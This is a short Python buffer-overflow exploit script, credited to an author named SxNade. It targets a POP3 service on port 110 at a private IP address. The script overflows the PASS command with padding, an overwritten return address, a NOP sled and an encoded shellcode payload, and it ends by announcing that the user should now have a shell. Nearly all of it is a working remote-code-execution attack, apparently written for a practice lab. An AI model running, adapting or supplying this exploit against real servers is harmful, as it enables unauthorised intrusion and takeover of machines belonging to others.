#By SxNade
#<https://github.com/SxNade>
#<https://sxnade.github.io>
import socket
import sys
import time
print("[+] Initiating Buffer-overflow.....")
buffer = "A" * 2606
eip = "\x8f\x35\x4a\x5f"
nops = "\x90" * 16
buf = b""
buf += b"\xbb\x95\x02\xec\xa0\xd9\xe1\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x5a\x12\x83\xea\xfc\x03\xcf\x0c\x0e"
buf += b"\x55\x13\xf8\x4c\x96\xeb\xf9\x30\x1e\x0e\xc8\x70\x44"
buf += b"\x5b\x7b\x41\x0e\x09\x70\x2a\x42\xb9\x03\x5e\x4b\xce"
buf += b"\xa4\xd5\xad\xe1\x35\x45\x8d\x60\xb6\x94\xc2\x42\x87"
buf += b"\x56\x17\x83\xc0\x8b\xda\xd1\x99\xc0\x49\xc5\xae\x9d"
buf += b"\x51\x6e\xfc\x30\xd2\x93\xb5\x33\xf3\x02\xcd\x6d\xd3"
buf += b"\xa5\x02\x06\x5a\xbd\x47\x23\x14\x36\xb3\xdf\xa7\x9e"
buf += b"\x8d\x20\x0b\xdf\x21\xd3\x55\x18\x85\x0c\x20\x50\xf5"
buf += b"\xb1\x33\xa7\x87\x6d\xb1\x33\x2f\xe5\x61\x9f\xd1\x2a"
buf += b"\xf7\x54\xdd\x87\x73\x32\xc2\x16\x57\x49\xfe\x93\x56"
buf += b"\x9d\x76\xe7\x7c\x39\xd2\xb3\x1d\x18\xbe\x12\x21\x7a"
buf += b"\x61\xca\x87\xf1\x8c\x1f\xba\x58\xd9\xec\xf7\x62\x19"
buf += b"\x7b\x8f\x11\x2b\x24\x3b\xbd\x07\xad\xe5\x3a\x67\x84"
buf += b"\x52\xd4\x96\x27\xa3\xfd\x5c\x73\xf3\x95\x75\xfc\x98"
buf += b"\x65\x79\x29\x0e\x35\xd5\x82\xef\xe5\x95\x72\x98\xef"
buf += b"\x19\xac\xb8\x10\xf0\xc5\x53\xeb\x93\x29\x0b\xd8\xe6"
buf += b"\xc2\x4e\x1e\xe8\xa9\xc6\xf8\x80\xdd\x8e\x53\x3d\x47"
buf += b"\x8b\x2f\xdc\x88\x01\x4a\xde\x03\xa6\xab\x91\xe3\xc3"
buf += b"\xbf\x46\x04\x9e\x9d\xc1\x1b\x34\x89\x8e\x8e\xd3\x49"
buf += b"\xd8\xb2\x4b\x1e\x8d\x05\x82\xca\x23\x3f\x3c\xe8\xb9"
buf += b"\xd9\x07\xa8\x65\x1a\x89\x31\xeb\x26\xad\x21\x35\xa6"
buf += b"\xe9\x15\xe9\xf1\xa7\xc3\x4f\xa8\x09\xbd\x19\x07\xc0"
buf += b"\x29\xdf\x6b\xd3\x2f\xe0\xa1\xa5\xcf\x51\x1c\xf0\xf0"
buf += b"\x5e\xc8\xf4\x89\x82\x68\xfa\x40\x07\x88\x19\x40\x72"
buf += b"\x21\x84\x01\x3f\x2c\x37\xfc\x7c\x49\xb4\xf4\xfc\xae"
buf += b"\xa4\x7d\xf8\xeb\x62\x6e\x70\x63\x07\x90\x27\x84\x02"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.40', 110))
s.recv(1024)
s.send('USER hacker\r\n')
s.recv(1024)
s.send('PASS ' + buffer + eip + nops + buf + '\r\n')
s.send('QUIT\r\n')
s.close()
print("[+] Exploit Completed")
print("\n[+] Hopefully You Should Have a Shell Now!\n")
time.sleep(1)
/co